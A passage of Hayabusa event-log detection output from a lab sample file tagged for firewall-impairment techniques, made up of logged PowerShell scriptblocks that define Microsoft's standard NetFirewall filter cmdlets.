'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.973 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.974 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.975 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.975 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.975 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.000 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 